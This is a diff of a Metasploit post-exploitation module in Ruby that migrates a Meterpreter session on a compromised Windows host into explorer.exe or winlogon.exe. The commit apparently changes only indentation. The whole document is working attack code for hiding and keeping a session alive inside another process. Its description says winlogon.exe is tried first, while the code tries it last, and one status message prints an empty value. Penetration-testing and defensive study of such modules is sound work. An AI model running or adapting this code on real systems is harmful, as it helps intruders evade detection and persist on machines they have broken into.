|
10 | 10 |
|
11 | 11 | class Metasploit3 < Msf::Post |
12 | 12 |
|
13 | | - def initialize(info={}) |
14 | | - super( update_info( info, |
15 | | - 'Name' => 'Windows Manage Smart Process Migration', |
16 | | - 'Description' => %q{ This module will migrate a Meterpreter session. |
17 | | - It will first attempt to migrate to winlogon.exe . If that fails it will |
18 | | - then look at all of the explorer.exe processes. If there is one that exists |
19 | | - for the user context the session is already in it will try that. Failing that it will fall back |
20 | | - and try any other explorer.exe processes it finds}, |
21 | | - 'License' => MSF_LICENSE, |
22 | | - 'Author' => [ 'thelightcosine'], |
23 | | - 'Platform' => [ 'win' ], |
24 | | - 'SessionTypes' => [ 'meterpreter' ] |
25 | | - )) |
| 13 | + def initialize(info={}) |
| 14 | + super( update_info( info, |
| 15 | + 'Name' => 'Windows Manage Smart Process Migration', |
| 16 | + 'Description' => %q{ This module will migrate a Meterpreter session. |
| 17 | + It will first attempt to migrate to winlogon.exe . If that fails it will |
| 18 | + then look at all of the explorer.exe processes. If there is one that exists |
| 19 | + for the user context the session is already in it will try that. Failing that it will fall back |
| 20 | + and try any other explorer.exe processes it finds}, |
| 21 | + 'License' => MSF_LICENSE, |
| 22 | + 'Author' => [ 'thelightcosine'], |
| 23 | + 'Platform' => [ 'win' ], |
| 24 | + 'SessionTypes' => [ 'meterpreter' ] |
| 25 | + )) |
26 | 26 |
|
27 | 27 |
|
28 | | - end |
| 28 | + end |
29 | 29 |
|
30 | | - def run |
31 | | - server = client.sys.process.open |
32 | | - original_pid = server.pid |
33 | | - print_status("Current server process: #{server.name} (#{server.pid})") |
| 30 | + def run |
| 31 | + server = client.sys.process.open |
| 32 | + original_pid = server.pid |
| 33 | + print_status("Current server process: #{server.name} (#{server.pid})") |
34 | 34 |
|
35 | | - uid = client.sys.config.getuid |
| 35 | + uid = client.sys.config.getuid |
36 | 36 |
|
37 | | - processes = client.sys.process.get_processes |
| 37 | + processes = client.sys.process.get_processes |
38 | 38 |
|
39 | | - uid_explorer_procs = [] |
40 | | - explorer_procs = [] |
41 | | - winlogon_procs = [] |
42 | | - processes.each do |proc| |
43 | | - uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid |
44 | | - explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid |
45 | | - winlogon_procs << proc if proc['name'] == "winlogon.exe" |
46 | | - end |
| 39 | + uid_explorer_procs = [] |
| 40 | + explorer_procs = [] |
| 41 | + winlogon_procs = [] |
| 42 | + processes.each do |proc| |
| 43 | + uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid |
| 44 | + explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid |
| 45 | + winlogon_procs << proc if proc['name'] == "winlogon.exe" |
| 46 | + end |
47 | 47 |
|
48 | 48 | print_status "Attempting to move into explorer.exe for current user..." |
49 | | - uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } |
| 49 | + uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } |
50 | 50 | print_status "Attempting to move into explorer.exe for other users..." |
51 | | - explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } |
| 51 | + explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } |
52 | 52 | print_status "Attempting to move into winlogon.exe" |
53 | 53 | winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) } |
54 | 54 |
|
55 | | - print_error "Was unable to sucessfully migrate into any of our likely candidates" |
56 | | - end |
| 55 | + print_error "Was unable to sucessfully migrate into any of our likely candidates" |
| 56 | + end |
57 | 57 |
|
58 | 58 |
|
59 | | - def attempt_migration(target_pid) |
60 | | - begin |
61 | | - print_good("Migrating to #{target_pid}") |
62 | | - client.core.migrate(target_pid) |
63 | | - print_good("Successfully migrated to process #{}") |
64 | | - return true |
65 | | - rescue ::Exception => e |
66 | | - print_error("Could not migrate in to process.") |
67 | | - print_error(e.to_s) |
68 | | - return false |
69 | | - end |
70 | | - end |
| 59 | + def attempt_migration(target_pid) |
| 60 | + begin |
| 61 | + print_good("Migrating to #{target_pid}") |
| 62 | + client.core.migrate(target_pid) |
| 63 | + print_good("Successfully migrated to process #{}") |
| 64 | + return true |
| 65 | + rescue ::Exception => e |
| 66 | + print_error("Could not migrate in to process.") |
| 67 | + print_error(e.to_s) |
| 68 | + return false |
| 69 | + end |
| 70 | + end |
71 | 71 | end |
0 commit comments